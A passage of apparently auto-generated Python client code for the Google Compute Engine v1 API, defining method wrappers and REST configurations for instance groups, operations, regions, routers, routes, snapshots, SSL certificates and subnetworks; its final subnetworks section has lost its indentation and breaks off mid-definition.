        If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.

        Args:
          request: (ComputeRegionInstanceGroupManagersResizeRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('Resize')
        return self._RunMethod(
            config, request, global_params=global_params)

    Resize.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.regionInstanceGroupManagers.resize',
        # 'size' is a required parameter but travels as a query parameter.
        ordered_params=[u'project', u'region', u'instanceGroupManager', u'size'],
        path_params=[u'instanceGroupManager', u'project', u'region'],
        query_params=[u'size'],
        relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/resize',
        request_field='',
        request_type_name=u'ComputeRegionInstanceGroupManagersResizeRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def SetInstanceTemplate(self, request, global_params=None):
        """Sets the instance template to use when creating new instances or recreating instances in this group. Existing instances are not affected.

        Args:
          request: (ComputeRegionInstanceGroupManagersSetInstanceTemplateRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('SetInstanceTemplate')
        return self._RunMethod(
            config, request, global_params=global_params)

    SetInstanceTemplate.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.regionInstanceGroupManagers.setInstanceTemplate',
        ordered_params=[u'project', u'region', u'instanceGroupManager'],
        path_params=[u'instanceGroupManager', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/setInstanceTemplate',
        request_field=u'regionInstanceGroupManagersSetTemplateRequest',
        request_type_name=u'ComputeRegionInstanceGroupManagersSetInstanceTemplateRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def SetTargetPools(self, request, global_params=None):
        """Modifies the target pools to which all new instances in this group are assigned. Existing instances in the group are not affected.

        Args:
          request: (ComputeRegionInstanceGroupManagersSetTargetPoolsRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (Operation) The response message.
        """
        config = self.GetMethodConfig('SetTargetPools')
        return self._RunMethod(
            config, request, global_params=global_params)

    SetTargetPools.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.regionInstanceGroupManagers.setTargetPools',
        ordered_params=[u'project', u'region', u'instanceGroupManager'],
        path_params=[u'instanceGroupManager', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/setTargetPools',
        request_field=u'regionInstanceGroupManagersSetTargetPoolsRequest',
        request_type_name=u'ComputeRegionInstanceGroupManagersSetTargetPoolsRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
class RegionInstanceGroupsService(base_api.BaseApiService):
    """Service class for the regionInstanceGroups resource."""

    _NAME = u'regionInstanceGroups'

    def __init__(self, client):
        super(ComputeV1.RegionInstanceGroupsService, self).__init__(client)
        # This resource exposes no media-upload methods.
        self._upload_configs = {}

    def Get(self, request, global_params=None):
        """Returns the specified instance group resource.

        Args:
          request: (ComputeRegionInstanceGroupsGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (InstanceGroup) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.regionInstanceGroups.get',
        ordered_params=[u'project', u'region', u'instanceGroup'],
        path_params=[u'instanceGroup', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/instanceGroups/{instanceGroup}',
        request_field='',
        request_type_name=u'ComputeRegionInstanceGroupsGetRequest',
        response_type_name=u'InstanceGroup',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves the list of instance group resources contained within the specified region.

        Args:
          request: (ComputeRegionInstanceGroupsListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (RegionInstanceGroupList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.regionInstanceGroups.list',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/regions/{region}/instanceGroups',
        request_field='',
        request_type_name=u'ComputeRegionInstanceGroupsListRequest',
        response_type_name=u'RegionInstanceGroupList',
        supports_download=False,
    )

    def ListInstances(self, request, global_params=None):
        """Lists the instances in the specified instance group and displays information about the named ports. Depending on the specified options, this method can list all instances or only the instances that are running.

        Args:
          request: (ComputeRegionInstanceGroupsListInstancesRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (RegionInstanceGroupsListInstances) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('ListInstances'), request,
            global_params=global_params)

    ListInstances.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.regionInstanceGroups.listInstances',
        ordered_params=[u'project', u'region', u'instanceGroup'],
        path_params=[u'instanceGroup', u'project', u'region'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/regions/{region}/instanceGroups/{instanceGroup}/listInstances',
        request_field=u'regionInstanceGroupsListInstancesRequest',
        request_type_name=u'ComputeRegionInstanceGroupsListInstancesRequest',
        response_type_name=u'RegionInstanceGroupsListInstances',
        supports_download=False,
    )

    def SetNamedPorts(self, request, global_params=None):
        """Sets the named ports for the specified regional instance group.

        Args:
          request: (ComputeRegionInstanceGroupsSetNamedPortsRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('SetNamedPorts'), request,
            global_params=global_params)

    SetNamedPorts.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.regionInstanceGroups.setNamedPorts',
        ordered_params=[u'project', u'region', u'instanceGroup'],
        path_params=[u'instanceGroup', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/instanceGroups/{instanceGroup}/setNamedPorts',
        request_field=u'regionInstanceGroupsSetNamedPortsRequest',
        request_type_name=u'ComputeRegionInstanceGroupsSetNamedPortsRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
class RegionOperationsService(base_api.BaseApiService):
    """Service class for the regionOperations resource."""

    _NAME = u'regionOperations'

    def __init__(self, client):
        super(ComputeV1.RegionOperationsService, self).__init__(client)
        # This resource exposes no media-upload methods.
        self._upload_configs = {}

    def Delete(self, request, global_params=None):
        """Deletes the specified region-specific Operations resource.

        Args:
          request: (ComputeRegionOperationsDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (ComputeRegionOperationsDeleteResponse) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.regionOperations.delete',
        ordered_params=[u'project', u'region', u'operation'],
        path_params=[u'operation', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/operations/{operation}',
        request_field='',
        request_type_name=u'ComputeRegionOperationsDeleteRequest',
        response_type_name=u'ComputeRegionOperationsDeleteResponse',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Retrieves the specified region-specific Operations resource.

        Args:
          request: (ComputeRegionOperationsGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.regionOperations.get',
        ordered_params=[u'project', u'region', u'operation'],
        path_params=[u'operation', u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/operations/{operation}',
        request_field='',
        request_type_name=u'ComputeRegionOperationsGetRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves a list of Operation resources contained within the specified region.

        Args:
          request: (ComputeRegionOperationsListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (OperationList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.regionOperations.list',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/regions/{region}/operations',
        request_field='',
        request_type_name=u'ComputeRegionOperationsListRequest',
        response_type_name=u'OperationList',
        supports_download=False,
    )
class RegionsService(base_api.BaseApiService):
    """Service class for the regions resource."""

    _NAME = u'regions'

    def __init__(self, client):
        super(ComputeV1.RegionsService, self).__init__(client)
        # This resource exposes no media-upload methods.
        self._upload_configs = {}

    def Get(self, request, global_params=None):
        """Returns the specified Region resource. Get a list of available regions by making a list() request.

        Args:
          request: (ComputeRegionsGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Region) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.regions.get',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}',
        request_field='',
        request_type_name=u'ComputeRegionsGetRequest',
        response_type_name=u'Region',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves the list of region resources available to the specified project.

        Args:
          request: (ComputeRegionsListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (RegionList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.regions.list',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/regions',
        request_field='',
        request_type_name=u'ComputeRegionsListRequest',
        response_type_name=u'RegionList',
        supports_download=False,
    )
class RoutersService(base_api.BaseApiService):
    """Service class for the routers resource."""

    _NAME = u'routers'

    def __init__(self, client):
        super(ComputeV1.RoutersService, self).__init__(client)
        # This resource exposes no media-upload methods.
        self._upload_configs = {}

    def AggregatedList(self, request, global_params=None):
        """Retrieves an aggregated list of routers.

        Args:
          request: (ComputeRoutersAggregatedListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (RouterAggregatedList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('AggregatedList'), request,
            global_params=global_params)

    AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.routers.aggregatedList',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/aggregated/routers',
        request_field='',
        request_type_name=u'ComputeRoutersAggregatedListRequest',
        response_type_name=u'RouterAggregatedList',
        supports_download=False,
    )

    def Delete(self, request, global_params=None):
        """Deletes the specified Router resource.

        Args:
          request: (ComputeRoutersDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.routers.delete',
        ordered_params=[u'project', u'region', u'router'],
        path_params=[u'project', u'region', u'router'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/routers/{router}',
        request_field='',
        request_type_name=u'ComputeRoutersDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified Router resource. Get a list of available routers by making a list() request.

        Args:
          request: (ComputeRoutersGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Router) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.routers.get',
        ordered_params=[u'project', u'region', u'router'],
        path_params=[u'project', u'region', u'router'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/routers/{router}',
        request_field='',
        request_type_name=u'ComputeRoutersGetRequest',
        response_type_name=u'Router',
        supports_download=False,
    )

    def GetRouterStatus(self, request, global_params=None):
        """Retrieves runtime information of the specified router.

        Args:
          request: (ComputeRoutersGetRouterStatusRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (RouterStatusResponse) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('GetRouterStatus'), request,
            global_params=global_params)

    GetRouterStatus.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.routers.getRouterStatus',
        ordered_params=[u'project', u'region', u'router'],
        path_params=[u'project', u'region', u'router'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/routers/{router}/getRouterStatus',
        request_field='',
        request_type_name=u'ComputeRoutersGetRouterStatusRequest',
        response_type_name=u'RouterStatusResponse',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates a Router resource in the specified project and region using the data included in the request.

        Args:
          request: (ComputeRoutersInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Insert'), request,
            global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.routers.insert',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/routers',
        request_field=u'router',
        request_type_name=u'ComputeRoutersInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves a list of Router resources available to the specified project.

        Args:
          request: (ComputeRoutersListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (RouterList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.routers.list',
        ordered_params=[u'project', u'region'],
        path_params=[u'project', u'region'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/regions/{region}/routers',
        request_field='',
        request_type_name=u'ComputeRoutersListRequest',
        response_type_name=u'RouterList',
        supports_download=False,
    )

    def Patch(self, request, global_params=None):
        """Patches the specified Router resource with the data included in the request. This method supports PATCH semantics and uses JSON merge patch format and processing rules.

        Args:
          request: (ComputeRoutersPatchRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Patch'), request,
            global_params=global_params)

    Patch.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'PATCH',
        method_id=u'compute.routers.patch',
        ordered_params=[u'project', u'region', u'router'],
        path_params=[u'project', u'region', u'router'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/routers/{router}',
        request_field=u'routerResource',
        request_type_name=u'ComputeRoutersPatchRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Preview(self, request, global_params=None):
        """Preview fields auto-generated during router create and update operations. Calling this method does NOT create or update the router.

        Args:
          request: (ComputeRoutersPreviewRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (RoutersPreviewResponse) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Preview'), request,
            global_params=global_params)

    Preview.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.routers.preview',
        ordered_params=[u'project', u'region', u'router'],
        path_params=[u'project', u'region', u'router'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/routers/{router}/preview',
        request_field=u'routerResource',
        request_type_name=u'ComputeRoutersPreviewRequest',
        response_type_name=u'RoutersPreviewResponse',
        supports_download=False,
    )

    def Update(self, request, global_params=None):
        """Updates the specified Router resource with the data included in the request.

        Args:
          request: (ComputeRoutersUpdateRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Update'), request,
            global_params=global_params)

    Update.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'PUT',
        method_id=u'compute.routers.update',
        ordered_params=[u'project', u'region', u'router'],
        path_params=[u'project', u'region', u'router'],
        query_params=[],
        relative_path=u'projects/{project}/regions/{region}/routers/{router}',
        request_field=u'routerResource',
        request_type_name=u'ComputeRoutersUpdateRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
class RoutesService(base_api.BaseApiService):
    """Service class for the routes resource."""

    _NAME = u'routes'

    def __init__(self, client):
        super(ComputeV1.RoutesService, self).__init__(client)
        # This resource exposes no media-upload methods.
        self._upload_configs = {}

    def Delete(self, request, global_params=None):
        """Deletes the specified Route resource.

        Args:
          request: (ComputeRoutesDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.routes.delete',
        ordered_params=[u'project', u'route'],
        path_params=[u'project', u'route'],
        query_params=[],
        relative_path=u'projects/{project}/global/routes/{route}',
        request_field='',
        request_type_name=u'ComputeRoutesDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified Route resource. Get a list of available routes by making a list() request.

        Args:
          request: (ComputeRoutesGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Route) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.routes.get',
        ordered_params=[u'project', u'route'],
        path_params=[u'project', u'route'],
        query_params=[],
        relative_path=u'projects/{project}/global/routes/{route}',
        request_field='',
        request_type_name=u'ComputeRoutesGetRequest',
        response_type_name=u'Route',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates a Route resource in the specified project using the data included in the request.

        Args:
          request: (ComputeRoutesInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Insert'), request,
            global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.routes.insert',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/routes',
        request_field=u'route',
        request_type_name=u'ComputeRoutesInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves the list of Route resources available to the specified project.

        Args:
          request: (ComputeRoutesListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (RouteList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.routes.list',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/global/routes',
        request_field='',
        request_type_name=u'ComputeRoutesListRequest',
        response_type_name=u'RouteList',
        supports_download=False,
    )
class SnapshotsService(base_api.BaseApiService):
    """Service class for the snapshots resource."""

    _NAME = u'snapshots'

    def __init__(self, client):
        super(ComputeV1.SnapshotsService, self).__init__(client)
        # This resource exposes no media-upload methods.
        self._upload_configs = {}

    def Delete(self, request, global_params=None):
        """Deletes the specified Snapshot resource. Keep in mind that deleting a single snapshot might not necessarily delete all the data on that snapshot. If any data on the snapshot that is marked for deletion is needed for subsequent snapshots, the data will be moved to the next corresponding snapshot.

        For more information, see Deleting snaphots.

        Args:
          request: (ComputeSnapshotsDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.snapshots.delete',
        ordered_params=[u'project', u'snapshot'],
        path_params=[u'project', u'snapshot'],
        query_params=[],
        relative_path=u'projects/{project}/global/snapshots/{snapshot}',
        request_field='',
        request_type_name=u'ComputeSnapshotsDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified Snapshot resource. Get a list of available snapshots by making a list() request.

        Args:
          request: (ComputeSnapshotsGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Snapshot) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.snapshots.get',
        ordered_params=[u'project', u'snapshot'],
        path_params=[u'project', u'snapshot'],
        query_params=[],
        relative_path=u'projects/{project}/global/snapshots/{snapshot}',
        request_field='',
        request_type_name=u'ComputeSnapshotsGetRequest',
        response_type_name=u'Snapshot',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves the list of Snapshot resources contained within the specified project.

        Args:
          request: (ComputeSnapshotsListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (SnapshotList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.snapshots.list',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/global/snapshots',
        request_field='',
        request_type_name=u'ComputeSnapshotsListRequest',
        response_type_name=u'SnapshotList',
        supports_download=False,
    )

    def SetLabels(self, request, global_params=None):
        """Sets the labels on a snapshot. To learn more about labels, read the Labeling Resources documentation.

        Args:
          request: (ComputeSnapshotsSetLabelsRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('SetLabels'), request,
            global_params=global_params)

    SetLabels.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.snapshots.setLabels',
        ordered_params=[u'project', u'resource'],
        path_params=[u'project', u'resource'],
        query_params=[],
        relative_path=u'projects/{project}/global/snapshots/{resource}/setLabels',
        request_field=u'globalSetLabelsRequest',
        request_type_name=u'ComputeSnapshotsSetLabelsRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
class SslCertificatesService(base_api.BaseApiService):
    """Service class for the sslCertificates resource."""

    _NAME = u'sslCertificates'

    def __init__(self, client):
        super(ComputeV1.SslCertificatesService, self).__init__(client)
        # This resource exposes no media-upload methods.
        self._upload_configs = {}

    def Delete(self, request, global_params=None):
        """Deletes the specified SslCertificate resource.

        Args:
          request: (ComputeSslCertificatesDeleteRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Delete'), request,
            global_params=global_params)

    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.sslCertificates.delete',
        ordered_params=[u'project', u'sslCertificate'],
        path_params=[u'project', u'sslCertificate'],
        query_params=[],
        relative_path=u'projects/{project}/global/sslCertificates/{sslCertificate}',
        request_field='',
        request_type_name=u'ComputeSslCertificatesDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def Get(self, request, global_params=None):
        """Returns the specified SslCertificate resource. Get a list of available SSL certificates by making a list() request.

        Args:
          request: (ComputeSslCertificatesGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (SslCertificate) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Get'), request,
            global_params=global_params)

    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.sslCertificates.get',
        ordered_params=[u'project', u'sslCertificate'],
        path_params=[u'project', u'sslCertificate'],
        query_params=[],
        relative_path=u'projects/{project}/global/sslCertificates/{sslCertificate}',
        request_field='',
        request_type_name=u'ComputeSslCertificatesGetRequest',
        response_type_name=u'SslCertificate',
        supports_download=False,
    )

    def Insert(self, request, global_params=None):
        """Creates a SslCertificate resource in the specified project using the data included in the request.

        Args:
          request: (ComputeSslCertificatesInsertRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (Operation) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('Insert'), request,
            global_params=global_params)

    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.sslCertificates.insert',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/sslCertificates',
        request_field=u'sslCertificate',
        request_type_name=u'ComputeSslCertificatesInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )

    def List(self, request, global_params=None):
        """Retrieves the list of SslCertificate resources available to the specified project.

        Args:
          request: (ComputeSslCertificatesListRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments

        Returns:
          (SslCertificateList) The response message.
        """
        return self._RunMethod(
            self.GetMethodConfig('List'), request,
            global_params=global_params)

    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.sslCertificates.list',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/global/sslCertificates',
        request_field='',
        request_type_name=u'ComputeSslCertificatesListRequest',
        response_type_name=u'SslCertificateList',
        supports_download=False,
    )
class SubnetworksService(base_api.BaseApiService):
"""Service class for the subnetworks resource."""
_NAME = u'subnetworks'
def __init__(self, client):
super(ComputeV1.SubnetworksService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of subnetworks.
Args:
request: (ComputeSubnetworksAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(SubnetworkAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.subnetworks.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/subnetworks',
request_field='',
request_type_name=u'ComputeSubnetworksAggregatedListRequest',
response_type_name=u'SubnetworkAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified subnetwork.
Args:
request: (ComputeSubnetworksDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.subnetworks.delete',
ordered_params=[u'project', u'region', u'subnetwork'],
path_params=[u'project', u'region', u'subnetwork'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/subnetworks/{subnetwork}',
request_field='',
request_type_name=u'ComputeSubnetworksDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def ExpandIpCidrRange(self, request, global_params=None):
"""Expands the IP CIDR range of the subnetwork to a specified value.
Args:
request: (ComputeSubnetworksExpandIpCidrRangeRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('ExpandIpCidrRange')
return self._RunMethod(
config, request, global_params=global_params)
ExpandIpCidrRange.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.subnetworks.expandIpCidrRange',
ordered_params=[u'project', u'region', u'subnetwork'],
path_params=[u'project', u'region', u'subnetwork'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/subnetworks/{subnetwork}/expandIpCidrRange',
request_field=u'subnetworksExpandIpCidrRangeRequest',
request_type_name=u'ComputeSubnetworksExpandIpCidrRangeRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified subnetwork. Get a list of available subnetworks list() request.
Args:
request: (ComputeSubnetworksGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Subnetwork) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.subnetworks.get',
ordered_params=[u'project', u'region', u'subnetwork'],
path_params=[u'project', u'region', u'subnetwork'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/subnetworks/{subnetwork}',
request_field='',
request_type_name=u'ComputeSubnetworksGetRequest',
response_type_name=u'Subnetwork',
supports_download=False,
)
def Insert(self, request, global_params=None):
